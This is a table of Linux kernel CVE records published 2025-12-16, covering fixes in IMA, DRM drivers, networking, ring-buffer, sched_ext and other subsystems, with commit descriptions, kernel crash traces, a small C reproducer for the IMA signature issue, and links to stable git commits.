| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ima: don't clear IMA_DIGSIG flag when setting or removing non-IMA xattr Currently when both IMA and EVM are in fix mode, the IMA signature will be reset to IMA hash if a program first stores IMA signature in security.ima and then writes/removes some other security xattr for the file. For example, on Fedora, after booting the kernel with "ima_appraise=fix evm=fix ima_policy=appraise_tcb" and installing rpm-plugin-ima, installing/reinstalling a package will not make good reference IMA signature generated. Instead IMA hash is generated, # getfattr -m - -d -e hex /usr/bin/bash # file: usr/bin/bash security.ima=0x0404... This happens because when setting security.selinux, the IMA_DIGSIG flag that had been set early was cleared. As a result, IMA hash is generated when the file is closed. Similarly, IMA signature can be cleared on file close after removing security xattr like security.evm or setting/removing ACL. Prevent replacing the IMA file signature with a file hash, by preventing the IMA_DIGSIG flag from being reset. Here's a minimal C reproducer which sets security.selinux as the last step which can also replaced by removing security.evm or setting ACL, #include <stdio.h> #include <sys/xattr.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdlib.h> int main() { const char* file_path = "/usr/sbin/test_binary"; const char* hex_string = "030204d33204490066306402304"; int length = strlen(hex_string); char* ima_attr_value; int fd; fd = open(file_path, O_WRONLY|O_CREAT|O_EXCL, 0644); if (fd == -1) { perror("Error opening file"); return 1; } ima_attr_value = (char*)malloc(length / 2 ); for (int i = 0, j = 0; i < length; i += 2, j++) { sscanf(hex_string + i, "%2hhx", &ima_attr_value[j]); } if (fsetxattr(fd, "security.ima", ima_attr_value, length/2, 0) == -1) { perror("Error setting extended attribute"); close(fd); return 1; } const char* selinux_value= "system_u:object_r:bin_t:s0"; if (fsetxattr(fd, "security.selinux", selinux_value, strlen(selinux_value), 0) == -1) { perror("Error setting extended attribute"); close(fd); return 1; } close(fd); return 0; } | 2025-12-16 | not yet calculated | CVE-2025-68183 | https://git.kernel.org/stable/c/d2993a7e98eb70c737c6f5365a190e79c72b8407 https://git.kernel.org/stable/c/edd824eb45e4f7e05ad3ab090dab6dbdb79cd292 https://git.kernel.org/stable/c/02aa671c08a4834bef5166743a7b88686fbfa023 https://git.kernel.org/stable/c/88b4cbcf6b041ae0f2fc8a34554a5b6a83a2b7cd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: Disable AFBC support on Mediatek DRM driver Commit c410fa9b07c3 ("drm/mediatek: Add AFBC support to Mediatek DRM driver") added AFBC support to Mediatek DRM and enabled the 32x8/split/sparse modifier. However, this is currently broken on Mediatek MT8188 (Genio 700 EVK platform); tested using upstream Kernel and Mesa (v25.2.1), AFBC is used by default since Mesa v25.0. Kernel trace reports vblank timeouts constantly, and the render is garbled: ``` [CRTC:62:crtc-0] vblank wait timed out WARNING: CPU: 7 PID: 70 at drivers/gpu/drm/drm_atomic_helper.c:1835 drm_atomic_helper_wait_for_vblanks.part.0+0x24c/0x27c [...] Hardware name: MediaTek Genio-700 EVK (DT) Workqueue: events_unbound commit_work pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : drm_atomic_helper_wait_for_vblanks.part.0+0x24c/0x27c lr : drm_atomic_helper_wait_for_vblanks.part.0+0x24c/0x27c sp : ffff80008337bca0 x29: ffff80008337bcd0 x28: 0000000000000061 x27: 0000000000000000 x26: 0000000000000001 x25: 0000000000000000 x24: ffff0000c9dcc000 x23: 0000000000000001 x22: 0000000000000000 x21: ffff0000c66f2f80 x20: ffff0000c0d7d880 x19: 0000000000000000 x18: 000000000000000a x17: 000000040044ffff x16: 005000f2b5503510 x15: 0000000000000000 x14: 0000000000000000 x13: 74756f2064656d69 x12: 742074696177206b x11: 0000000000000058 x10: 0000000000000018 x9 : ffff800082396a70 x8 : 0000000000057fa8 x7 : 0000000000000cce x6 : ffff8000823eea70 x5 : ffff0001fef5f408 x4 : ffff80017ccee000 x3 : ffff0000c12cb480 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0000c12cb480 Call trace: drm_atomic_helper_wait_for_vblanks.part.0+0x24c/0x27c (P) drm_atomic_helper_commit_tail_rpm+0x64/0x80 commit_tail+0xa4/0x1a4 commit_work+0x14/0x20 process_one_work+0x150/0x290 worker_thread+0x2d0/0x3ec kthread+0x12c/0x210 ret_from_fork+0x10/0x20 ---[ end trace 0000000000000000 ]--- ``` Until this gets fixed upstream, disable AFBC support on this platform, as it's currently broken with upstream Mesa. | 2025-12-16 | not yet calculated | CVE-2025-68184 | https://git.kernel.org/stable/c/df1ad5de2197ea1b527d13ae7b699e9ee7d724d4 https://git.kernel.org/stable/c/0eaa0a3dfe218c4cf1a0782ccbbc9e3931718f17 https://git.kernel.org/stable/c/72223700b620885d556a4c52a63f5294316176c6 https://git.kernel.org/stable/c/9882a40640036d5bbc590426a78981526d4f2345 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfs4_setup_readdir(): insufficient locking for ->d_parent->d_inode dereferencing Theoretically it's an oopsable race, but I don't believe one can manage to hit it on real hardware; might become doable on a KVM, but it still won't be easy to attack. Anyway, it's easy to deal with - since xdr_encode_hyper() is just a call of put_unaligned_be64(), we can put that under ->d_lock and be done with that. | 2025-12-16 | not yet calculated | CVE-2025-68185 | https://git.kernel.org/stable/c/6025f641a0e30afdc5aa62017397b1860ad9f677 https://git.kernel.org/stable/c/e6cafe71eb3b5579b245ba1bd528a181e77f3df1 https://git.kernel.org/stable/c/fa4daf7d11e45b72aad5d943a7ab991f869fff79 https://git.kernel.org/stable/c/504b3fb9948a9e96ebbabdee0d33966a8bab15cb https://git.kernel.org/stable/c/eacfd08b26a062f1095b18719715bc82ad35312e https://git.kernel.org/stable/c/40be5b9080114f18b0cea386db415b68a7273c1a https://git.kernel.org/stable/c/f5e570eaab36a110c6ffda32b87c51170990c2d1 https://git.kernel.org/stable/c/a890a2e339b929dbd843328f9a92a1625404fe63 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ring-buffer: Do not warn in ring_buffer_map_get_reader() when reader catches up The function ring_buffer_map_get_reader() is a bit more strict than the other get reader functions, and except for certain situations the rb_get_reader_page() should not return NULL. If it does, it triggers a warning. This warning was triggering but after looking at why, it was because another acceptable situation was happening and it wasn't checked for. If the reader catches up to the writer and there's still data to be read on the reader page, then the rb_get_reader_page() will return NULL as there's no new page to get. In this situation, the reader page should not be updated and no warning should trigger. | 2025-12-16 | not yet calculated | CVE-2025-68186 | https://git.kernel.org/stable/c/b42dbef4f208326271434d5ab71c4129a3ddd1a9 https://git.kernel.org/stable/c/6f5c4f8109fa4d0955b3712597a26b310bdc736f https://git.kernel.org/stable/c/aa997d2d2a0b2e76f4df0f1f12829f02acb4fb6b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mdio: Check regmap pointer returned by device_node_to_regmap() The call to device_node_to_regmap() in airoha_mdio_probe() can return an ERR_PTR() if regmap initialization fails. Currently, the driver stores the pointer without validation, which could lead to a crash if it is later dereferenced. Add an IS_ERR() check and return the corresponding error code to make the probe path more robust. | 2025-12-16 | not yet calculated | CVE-2025-68187 | https://git.kernel.org/stable/c/dc8ed3823473bb38ba43cfb34f1e1c1baa22f975 https://git.kernel.org/stable/c/b2b526c2cf57d14ee269e012ed179081871f45a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() Use RCU to avoid a pair of atomic operations and a potential UAF on dst_dev()->flags. | 2025-12-16 | not yet calculated | CVE-2025-68188 | https://git.kernel.org/stable/c/bc2b881a0896c111c1041d8bb1f92a3b3873ace5 https://git.kernel.org/stable/c/06da08d9355bf8e2070459bbedbe372ccc02cc0e https://git.kernel.org/stable/c/b62a59c18b692f892dcb8109c1c2e653b2abc95c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: Fix GEM free for imported dma-bufs Imported dma-bufs also have obj->resv != &obj->_resv. So we should check both this condition in addition to flags for handling the _NO_SHARE case. Fixes this splat that was reported with IRIS video playback: ------------[ cut here ]------------ WARNING: CPU: 3 PID: 2040 at drivers/gpu/drm/msm/msm_gem.c:1127 msm_gem_free_object+0x1f8/0x264 [msm] CPU: 3 UID: 1000 PID: 2040 Comm: .gnome-shell-wr Not tainted 6.17.0-rc7 #1 PREEMPT pstate: 81400005 (Nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) pc : msm_gem_free_object+0x1f8/0x264 [msm] lr : msm_gem_free_object+0x138/0x264 [msm] sp : ffff800092a1bb30 x29: ffff800092a1bb80 x28: ffff800092a1bce8 x27: ffffbc702dbdbe08 x26: 0000000000000008 x25: 0000000000000009 x24: 00000000000000a6 x23: ffff00083c72f850 x22: ffff00083c72f868 x21: ffff00087e69f200 x20: ffff00087e69f330 x19: ffff00084d157ae0 x18: 0000000000000000 x17: 0000000000000000 x16: ffffbc704bd46b80 x15: 0000ffffd0959540 x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000 x11: ffffbc702e6cdb48 x10: 0000000000000000 x9 : 000000000000003f x8 : ffff800092a1ba90 x7 : 0000000000000000 x6 : 0000000000000020 x5 : ffffbc704bd46c40 x4 : fffffdffe102cf60 x3 : 0000000000400032 x2 : 0000000000020000 x1 : ffff00087e6978e8 x0 : ffff00087e6977e8 Call trace: msm_gem_free_object+0x1f8/0x264 [msm] (P) drm_gem_object_free+0x1c/0x30 [drm] drm_gem_object_handle_put_unlocked+0x138/0x150 [drm] drm_gem_object_release_handle+0x5c/0xcc [drm] drm_gem_handle_delete+0x68/0xbc [drm] drm_gem_close_ioctl+0x34/0x40 [drm] drm_ioctl_kernel+0xc0/0x130 [drm] drm_ioctl+0x360/0x4e0 [drm] __arm64_sys_ioctl+0xac/0x104 invoke_syscall+0x48/0x104 el0_svc_common.constprop.0+0x40/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0xec el0t_64_sync_handler+0xa0/0xe4 el0t_64_sync+0x198/0x19c ---[ end trace 0000000000000000 ]--- ------------[ cut here ]------------ Patchwork: https://patchwork.freedesktop.org/patch/676273/ | 2025-12-16 | not yet calculated | CVE-2025-68189 | https://git.kernel.org/stable/c/9674c4cb2fe62727a2e4d3f66065ab949dfa61be https://git.kernel.org/stable/c/c34e08ba6c0037a72a7433741225b020c989e4ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked() kcalloc() may fail. When WS is non-zero and allocation fails, ectx.ws remains NULL while ectx.ws_size is set, leading to a potential NULL pointer dereference in atom_get_src_int() when accessing WS entries. Return -ENOMEM on allocation failure to avoid the NULL dereference. | 2025-12-16 | not yet calculated | CVE-2025-68190 | https://git.kernel.org/stable/c/35f3fb86bb0158a298d6834e7e110dcaf07f490c https://git.kernel.org/stable/c/997e28d3d00a1d30649629515e4402612921205b https://git.kernel.org/stable/c/cc9a8e238e42c1f43b98c097995137d644b69245 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udp_tunnel: use netdev_warn() instead of netdev_WARN() netdev_WARN() uses WARN/WARN_ON to print a backtrace along with file and line information. In this case, udp_tunnel_nic_register() returning an error is just a failed operation, not a kernel bug. udp_tunnel_nic_register() can fail due to a memory allocation failure (kzalloc() or udp_tunnel_nic_alloc()). This is a normal runtime error and not a kernel bug. Replace netdev_WARN() with netdev_warn() accordingly. | 2025-12-16 | not yet calculated | CVE-2025-68191 | https://git.kernel.org/stable/c/087f1ed450dc6e7e49ffbbbe5b78be1218c6d5e0 https://git.kernel.org/stable/c/45e4e4a8772fa1c5f6f38e82b732b3a9d8137af4 https://git.kernel.org/stable/c/7758ec35ff3e9a31558eda4f0f9eb0ddfa78a8ba https://git.kernel.org/stable/c/c018a87942bf1607aeebf8dba5a210ca9a09a0fd https://git.kernel.org/stable/c/51b3033088f0420b19027e3d54cd989b6ebd987e https://git.kernel.org/stable/c/3c3b148bf8384c8a787753cf20abde1c5731f97f https://git.kernel.org/stable/c/dc2f650f7e6857bf384069c1a56b2937a1ee370d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: qmi_wwan: initialize MAC header offset in qmimux_rx_fixup Raw IP packets have no MAC header, leaving skb->mac_header uninitialized. This can trigger kernel panics on ARM64 when xfrm or other subsystems access the offset due to strict alignment checks. Initialize the MAC header to prevent such crashes. This can trigger kernel panics on ARM when running IPsec over the qmimux0 interface. Example trace: Internal error: Oops: 000000009600004f [#1] SMP CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.34-gbe78e49cb433 #1 Hardware name: LS1028A RDB Board (DT) pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : xfrm_input+0xde8/0x1318 lr : xfrm_input+0x61c/0x1318 sp : ffff800080003b20 Call trace: xfrm_input+0xde8/0x1318 xfrm6_rcv+0x38/0x44 xfrm6_esp_rcv+0x48/0xa8 ip6_protocol_deliver_rcu+0x94/0x4b0 ip6_input_finish+0x44/0x70 ip6_input+0x44/0xc0 ipv6_rcv+0x6c/0x114 __netif_receive_skb_one_core+0x5c/0x8c __netif_receive_skb+0x18/0x60 process_backlog+0x78/0x17c __napi_poll+0x38/0x180 net_rx_action+0x168/0x2f0 | 2025-12-16 | not yet calculated | CVE-2025-68192 | https://git.kernel.org/stable/c/d693c47fb902b988f5752182e4f7fbde5e6dcaf9 https://git.kernel.org/stable/c/0aabccdcec1f4a36f95829ea2263f845bbc77223 https://git.kernel.org/stable/c/4e6b9004f01d0fef5b19778399bc5bf55f8c2d71 https://git.kernel.org/stable/c/bf527b80b80a282ab5bf1540546211fc35e5cd42 https://git.kernel.org/stable/c/dd03780c29f87c26c0e0bb7e0db528c8109461fb https://git.kernel.org/stable/c/ae811175cea35b03ac6d7c910f43a82a43b9c3b3 https://git.kernel.org/stable/c/8ab3b8f958d861a7f725a5be60769106509fbd69 https://git.kernel.org/stable/c/e120f46768d98151ece8756ebd688b0e43dc8b29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/guc: Add devm release action to safely tear down CT When a buffer object (BO) is allocated with the XE_BO_FLAG_GGTT_INVALIDATE flag, the driver initiates TLB invalidation requests via the CTB mechanism while releasing the BO. However a premature release of the CTB BO can lead to system crashes, as observed in: Oops: Oops: 0000 [#1] SMP NOPTI RIP: 0010:h2g_write+0x2f3/0x7c0 [xe] Call Trace: guc_ct_send_locked+0x8b/0x670 [xe] xe_guc_ct_send_locked+0x19/0x60 [xe] send_tlb_invalidation+0xb4/0x460 [xe] xe_gt_tlb_invalidation_ggtt+0x15e/0x2e0 [xe] ggtt_invalidate_gt_tlb.part.0+0x16/0x90 [xe] ggtt_node_remove+0x110/0x140 [xe] xe_ggtt_node_remove+0x40/0xa0 [xe] xe_ggtt_remove_bo+0x87/0x250 [xe] Introduce a devm-managed release action during xe_guc_ct_init() and xe_guc_ct_init_post_hwconfig() to ensure proper CTB disablement before resource deallocation, preventing the use-after-free scenario. | 2025-12-16 | not yet calculated | CVE-2025-68193 | https://git.kernel.org/stable/c/52faa05fcd9f78af99abebe30a4b7b444744c991 https://git.kernel.org/stable/c/ee4b32220a6b41e71512e8804585325e685456ba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: imon: make send_packet() more robust syzbot is reporting that imon has three problems which result in hung tasks due to forever holding device lock [1]. First problem is that when usb_rx_callback_intf0() once got -EPROTO error after ictx->dev_present_intf0 became true, usb_rx_callback_intf0() resubmits urb after printk(), and resubmitted urb causes usb_rx_callback_intf0() to again get -EPROTO error. This results in printk() flooding (RCU stalls). Alan Stern commented [2] that In theory it's okay to resubmit _if_ the driver has a robust error-recovery scheme (such as giving up after some fixed limit on the number of errors or after some fixed time has elapsed, perhaps with a time delay to prevent a flood of errors). Most drivers don't bother to do this; they simply give up right away. This makes them more vulnerable to short-term noise interference during USB transfers, but in reality such interference is quite rare. There's nothing really wrong with giving up right away. but imon has a poor error-recovery scheme which just retries forever; this behavior should be fixed. Since I'm not sure whether it is safe for imon users to give up upon any error code, this patch takes care of only union of error codes chosen from modules in drivers/media/rc/ directory which handle -EPROTO error (i.e. ir_toy, mceusb and igorplugusb). Second problem is that when usb_rx_callback_intf0() once got -EPROTO error before ictx->dev_present_intf0 becomes true, usb_rx_callback_intf0() always resubmits urb due to commit 8791d63af0cf ("[media] imon: don't wedge hardware after early callbacks"). Move the ictx->dev_present_intf0 test introduced by commit 6f6b90c9231a ("[media] imon: don't parse scancodes until intf configured") to immediately before imon_incoming_packet(), or the first problem explained above happens without printk() flooding (i.e. hung task). Third problem is that when usb_rx_callback_intf0() is not called for some reason (e.g. flaky hardware; the reproducer for this problem sometimes prevents usb_rx_callback_intf0() from being called), wait_for_completion_interruptible() in send_packet() never returns (i.e. hung task). As a workaround for such situation, change send_packet() to wait for completion with timeout of 10 seconds. | 2025-12-16 | not yet calculated | CVE-2025-68194 | https://git.kernel.org/stable/c/519737af11c03590819a6eec2ad532cfdb87ea63 https://git.kernel.org/stable/c/f58ab83b7b7133e6baefe03a46846c4f6ce45e2f https://git.kernel.org/stable/c/26f6a1dd5d81ad61a875a747698da6f27abf389b https://git.kernel.org/stable/c/667afd4681781f60a644cd0d2ee6c59cb1c36208 https://git.kernel.org/stable/c/8231e80118463be5598daaf266c1c83650f1948b https://git.kernel.org/stable/c/0213e4175abbb9dfcbf7c197e3817d527f459ad5 https://git.kernel.org/stable/c/f7f3ecb4934fff782fa9bb1cd16e2290c041b22d https://git.kernel.org/stable/c/eecd203ada43a4693ce6fdd3a58ae10c7819252c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Add missing terminator for zen5_rdseed_microcode Running x86_match_min_microcode_rev() on a Zen5 CPU trips up KASAN for an out of bounds access. | 2025-12-16 | not yet calculated | CVE-2025-68195 | https://git.kernel.org/stable/c/4c6b56a76478bd1ab609827c571905386c11d308 https://git.kernel.org/stable/c/f1fdffe0afea02ba783acfe815b6a60e7180df40 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Cache streams targeting link when performing LT automation [WHY] Last LT automation update can cause crash by referencing current_state and calling into dc_update_planes_and_stream which may clobber current_state. [HOW] Cache relevant stream pointers and iterate through them instead of relying on the current_state. | 2025-12-16 | not yet calculated | CVE-2025-68196 | https://git.kernel.org/stable/c/9ecd238e8230e83a5c5436fd2261da4518f5c979 https://git.kernel.org/stable/c/f5b69101f956f5b89605a13cb15f093a7906f2a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix null pointer dereference in bnxt_bs_trace_check_wrap() With older FW, we may get the ASYNC_EVENT_CMPL_EVENT_ID_DBG_BUF_PRODUCER for FW trace data type that has not been initialized. This will result in a crash in bnxt_bs_trace_type_wrap(). Add a guard to check for a valid magic_byte pointer before proceeding. | 2025-12-16 | not yet calculated | CVE-2025-68197 | https://git.kernel.org/stable/c/689ae5ba31293eebb7f21c0ef8939468ac72b5ce https://git.kernel.org/stable/c/ff02be05f78399c766be68ab0b2285ff90b2aaa8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crash: fix crashkernel resource shrink When crashkernel is configured with a high reservation, shrinking its value below the low crashkernel reservation causes two issues: 1. Invalid crashkernel resource objects 2. Kernel crash if crashkernel shrinking is done twice For example, with crashkernel=200M,high, the kernel reserves 200MB of high memory and some default low memory (say 256MB). The reservation appears as: cat /proc/iomem | grep -i crash af000000-beffffff : Crash kernel 433000000-43f7fffff : Crash kernel If crashkernel is then shrunk to 50MB (echo 52428800 > /sys/kernel/kexec_crash_size), /proc/iomem still shows 256MB reserved: af000000-beffffff : Crash kernel Instead, it should show 50MB: af000000-b21fffff : Crash kernel Further shrinking crashkernel to 40MB causes a kernel crash with the following trace (x86): BUG: kernel NULL pointer dereference, address: 0000000000000038 PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI <snip...> Call Trace: <TASK> ? __die_body.cold+0x19/0x27 ? page_fault_oops+0x15a/0x2f0 ? search_module_extables+0x19/0x60 ? search_bpf_extables+0x5f/0x80 ? exc_page_fault+0x7e/0x180 ? asm_exc_page_fault+0x26/0x30 ? __release_resource+0xd/0xb0 release_resource+0x26/0x40 __crash_shrink_memory+0xe5/0x110 crash_shrink_memory+0x12a/0x190 kexec_crash_size_store+0x41/0x80 kernfs_fop_write_iter+0x141/0x1f0 vfs_write+0x294/0x460 ksys_write+0x6d/0xf0 <snip...> This happens because __crash_shrink_memory()/kernel/crash_core.c incorrectly updates the crashk_res resource object even when crashk_low_res should be updated. Fix this by ensuring the correct crashkernel resource object is updated when shrinking crashkernel memory. | 2025-12-16 | not yet calculated | CVE-2025-68198 | https://git.kernel.org/stable/c/f01f9c348d76d40bf104a94449e3ce4057fdefee https://git.kernel.org/stable/c/f89c5e7077f63e45e8ba5a77b7cf0803130367e6 https://git.kernel.org/stable/c/a2bd247f8c6c5ac3f0ba823a2fffd77bb9cdf618 https://git.kernel.org/stable/c/00fbff75c5acb4755f06f08bd1071879c63940c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: codetag: debug: handle existing CODETAG_EMPTY in mark_objexts_empty for slabobj_ext When alloc_slab_obj_exts() fails and then later succeeds in allocating a slab extension vector, it calls handle_failed_objexts_alloc() to mark all objects in the vector as empty. As a result all objects in this slab (slabA) will have their extensions set to CODETAG_EMPTY. Later on if this slabA is used to allocate a slabobj_ext vector for another slab (slabB), we end up with the slabB->obj_exts pointing to a slabobj_ext vector that itself has a non-NULL slabobj_ext equal to CODETAG_EMPTY. When slabB gets freed, free_slab_obj_exts() is called to free slabB->obj_exts vector. free_slab_obj_exts() calls mark_objexts_empty(slabB->obj_exts) which will generate a warning because it expects slabobj_ext vectors to have a NULL obj_ext, not CODETAG_EMPTY. Modify mark_objexts_empty() to skip the warning and setting the obj_ext value if it's already set to CODETAG_EMPTY. To quickly detect this WARN, I modified the code from WARN_ON(slab_exts[offs].ref.ct) to BUG_ON(slab_exts[offs].ref.ct == 1); We then obtained this message: [21630.898561] ------------[ cut here ]------------ [21630.898596] kernel BUG at mm/slub.c:2050! [21630.898611] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP [21630.900372] Modules linked in: squashfs isofs vfio_iommu_type1 vhost_vsock vfio vhost_net vmw_vsock_virtio_transport_common vhost tap vhost_iotlb iommufd vsock binfmt_misc nfsv3 nfs_acl nfs lockd grace netfs tls rds dns_resolver tun brd overlay ntfs3 exfat btrfs blake2b_generic xor xor_neon raid6_pq loop sctp ip6_udp_tunnel udp_tunnel nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables rfkill ip_set sunrpc vfat fat joydev sg sch_fq_codel nfnetlink virtio_gpu sr_mod cdrom drm_client_lib virtio_dma_buf drm_shmem_helper drm_kms_helper drm ghash_ce backlight virtio_net virtio_blk virtio_scsi net_failover virtio_console failover virtio_mmio dm_mirror dm_region_hash dm_log dm_multipath dm_mod fuse i2c_dev virtio_pci virtio_pci_legacy_dev virtio_pci_modern_dev virtio virtio_ring autofs4 aes_neon_bs aes_ce_blk [last unloaded: hwpoison_inject] [21630.909177] CPU: 3 UID: 0 PID: 3787 Comm: kylin-process-m Kdump: loaded Tainted: G W 6.18.0-rc1+ #74 PREEMPT(voluntary) [21630.910495] Tainted: [W]=WARN [21630.910867] Hardware name: QEMU KVM Virtual Machine, BIOS unknown 2/2/2022 [21630.911625] pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [21630.912392] pc : __free_slab+0x228/0x250 [21630.912868] lr : __free_slab+0x18c/0x250[21630.913334] sp : ffff8000a02f73e0 [21630.913830] x29: ffff8000a02f73e0 x28: fffffdffc43fc800 x27: ffff0000c0011c40 [21630.914677] x26: ffff0000c000cac0 x25: ffff00010fe5e5f0 x24: ffff000102199b40 [21630.915469] x23: 0000000000000003 x22: 0000000000000003 x21: ffff0000c0011c40 [21630.916259] x20: fffffdffc4086600 x19: fffffdffc43fc800 x18: 0000000000000000 [21630.917048] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 [21630.917837] x14: 0000000000000000 x13: 0000000000000000 x12: ffff70001405ee66 [21630.918640] x11: 1ffff0001405ee65 x10: ffff70001405ee65 x9 : ffff800080a295dc [21630.919442] x8 : ffff8000a02f7330 x7 : 0000000000000000 x6 : 0000000000003000 [21630.920232] x5 : 0000000024924925 x4 : 0000000000000001 x3 : 0000000000000007 [21630.921021] x2 : 0000000000001b40 x1 : 000000000000001f x0 : 0000000000000001 [21630.921810] Call trace: [21630.922130] __free_slab+0x228/0x250 (P) [21630.922669] free_slab+0x38/0x118 [21630.923079] free_to_partial_list+0x1d4/0x340 [21630.923591] __slab_free+0x24c/0x348 [21630.924024] ___cache_free+0xf0/0x110 [21630.924468] qlist_free_all+0x78/0x130 [21630.924922] kasan_quarantine_reduce+0x11 ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68199 | https://git.kernel.org/stable/c/fc6acd4cddf76e7eb7db63649fe36980ce208f56 https://git.kernel.org/stable/c/3f56c407feb967e6faeb4e2e04eaa8edc206a686 https://git.kernel.org/stable/c/1abbdf3d57aa964e572940d67c9ec5dc87710738 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Add bpf_prog_run_data_pointers() syzbot found that cls_bpf_classify() is able to change tc_skb_cb(skb)->drop_reason triggering a warning in sk_skb_reason_drop(). WARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline] WARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214 struct tc_skb_cb has been added in commit ec624fe740b4 ("net/sched: Extend qdisc control block with tc control block"), which added a wrong interaction with db58ba459202 ("bpf: wire in data and data_end for cls_act_bpf"). drop_reason was added later. Add bpf_prog_run_data_pointers() helper to save/restore the net_sched storage colliding with BPF data_meta/data_end. | 2025-12-16 | not yet calculated | CVE-2025-68200 | https://git.kernel.org/stable/c/c4cdd143c35974a2cedd000fa9eb3accc3023b20 https://git.kernel.org/stable/c/5e149d8a8e732126fb6014efd60075cf63a73f91 https://git.kernel.org/stable/c/baa61dcaa50b7141048c8d2aede7fe9ed8f21d11 https://git.kernel.org/stable/c/6392e5f4b1a3cce10e828309baf35d22abd3457d https://git.kernel.org/stable/c/8dd2fe5f5d586c8e87307b7a271f6b994afcc006 https://git.kernel.org/stable/c/4ef92743625818932b9c320152b58274c05e5053 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: remove two invalid BUG_ON()s Those can be triggered trivially by userspace. | 2025-12-16 | not yet calculated | CVE-2025-68201 | https://git.kernel.org/stable/c/eaf12bffd7f79f4d46ec028706f9d1a2d90f46fd https://git.kernel.org/stable/c/a41bdba05899c7f455cd960ef0713acc335370dc https://git.kernel.org/stable/c/5d55ed19d4190d2c210ac05ac7a53f800a8c6fe5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix unsafe locking in the scx_dump_state() For built with CONFIG_PREEMPT_RT=y kernels, the dump_lock will be converted sleepable spinlock and not disable-irq, so the following scenarios occur: inconsistent {IN-HARDIRQ-W} -> {HARDIRQ-ON-W} usage. irq_work/0/27 [HC0[0]:SC0[0]:HE1:SE1] takes: (&rq->__lock){?...}-{2:2}, at: raw_spin_rq_lock_nested+0x2b/0x40 {IN-HARDIRQ-W} state was registered at: lock_acquire+0x1e1/0x510 _raw_spin_lock_nested+0x42/0x80 raw_spin_rq_lock_nested+0x2b/0x40 sched_tick+0xae/0x7b0 update_process_times+0x14c/0x1b0 tick_periodic+0x62/0x1f0 tick_handle_periodic+0x48/0xf0 timer_interrupt+0x55/0x80 __handle_irq_event_percpu+0x20a/0x5c0 handle_irq_event_percpu+0x18/0xc0 handle_irq_event+0xb5/0x150 handle_level_irq+0x220/0x460 __common_interrupt+0xa2/0x1e0 common_interrupt+0xb0/0xd0 asm_common_interrupt+0x2b/0x40 _raw_spin_unlock_irqrestore+0x45/0x80 __setup_irq+0xc34/0x1a30 request_threaded_irq+0x214/0x2f0 hpet_time_init+0x3e/0x60 x86_late_time_init+0x5b/0xb0 start_kernel+0x308/0x410 x86_64_start_reservations+0x1c/0x30 x86_64_start_kernel+0x96/0xa0 common_startup_64+0x13e/0x148 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(&rq->__lock); <Interrupt> lock(&rq->__lock); *** DEADLOCK *** stack backtrace: CPU: 0 UID: 0 PID: 27 Comm: irq_work/0 Call Trace: <TASK> dump_stack_lvl+0x8c/0xd0 dump_stack+0x14/0x20 print_usage_bug+0x42e/0x690 mark_lock.part.44+0x867/0xa70 ? __pfx_mark_lock.part.44+0x10/0x10 ? string_nocheck+0x19c/0x310 ? number+0x739/0x9f0 ? __pfx_string_nocheck+0x10/0x10 ? __pfx_check_pointer+0x10/0x10 ? kvm_sched_clock_read+0x15/0x30 ? sched_clock_noinstr+0xd/0x20 ? local_clock_noinstr+0x1c/0xe0 __lock_acquire+0xc4b/0x62b0 ? __pfx_format_decode+0x10/0x10 ? __pfx_string+0x10/0x10 ? __pfx___lock_acquire+0x10/0x10 ? __pfx_vsnprintf+0x10/0x10 lock_acquire+0x1e1/0x510 ? raw_spin_rq_lock_nested+0x2b/0x40 ? __pfx_lock_acquire+0x10/0x10 ? dump_line+0x12e/0x270 ? raw_spin_rq_lock_nested+0x20/0x40 _raw_spin_lock_nested+0x42/0x80 ? 